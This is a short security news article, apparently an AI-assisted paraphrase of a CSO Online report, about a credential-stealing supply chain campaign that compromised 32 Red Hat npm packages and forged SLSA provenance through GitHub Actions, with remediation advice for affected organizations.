Skip to content

Red Hat npm Packages Infected with Credential Stealer – Over 30 Releases Affected

Bottom line: At least 32 Red Hat npm packages were infected with a credential stealer that simultaneously manipulated GitHub workflows to publish additional packages with forged SLSA attestations and expand supply chain access.

Unknown attackers have compromised at least 32 npm packages from the Red Hat Cloud Services namespace and infected them with malware that exfiltrates developer credentials and authentication tokens from local environments and CI/CD systems.

Security researchers from Wiz, OX Security, and other organizations document a supply chain campaign tracked under the name Miasma and considered an evolution of the Shai-Hulud malware family. The compromised packages were downloaded by developers over the weekend and showed an average volume of approximately 80,000 weekly downloads. According to Wiz analysis, the malware used originated from the Mini-Shai-Hulud family, which had appeared multiple times in npm ecosystem attacks and traces back to TeamPCP.

The attackers integrated automatically executable malware into the installation of these packages. The malicious program was designed to collect npm authentication tokens, environment variables, cloud credentials, and other sensitive information. Particularly relevant for CTOs: The attackers also modified GitHub Actions workflows to make illegitimate package publications appear legitimate. The system requested GitHub OpenID Connect (OIDC) tokens and executed obfuscated code that published packages with valid SLSA provenance attestations – a technique already observed in earlier attacks against TanStack by the same actors.

The strategic objective of the campaign was not only immediate credential theft, but persistent presence and lateral movement. The malware specifically searched for publishing credentials to gain access to additional developer accounts and repositories. By the time of analysis, most infected versions had already been removed from the npm repository.

Affected organizations should immediately verify whether the manipulated packages were installed. Wiz recommends: rotate potentially compromised secrets, revoke and reissue npm publishing tokens, and review repository and package publishing activities. Since Red Hat Cloud Services is widely trusted in the enterprise environment, rapid audit activity is necessary to identify attackers who have moved laterally.


Source: www.csoonline.com · Published June 2, 2026
Lumi AI News — AI-assisted curation according to Art. 50 EU AI Act. Paraphrase and classification by Lumi News Pipeline v1.2.9.

Share on: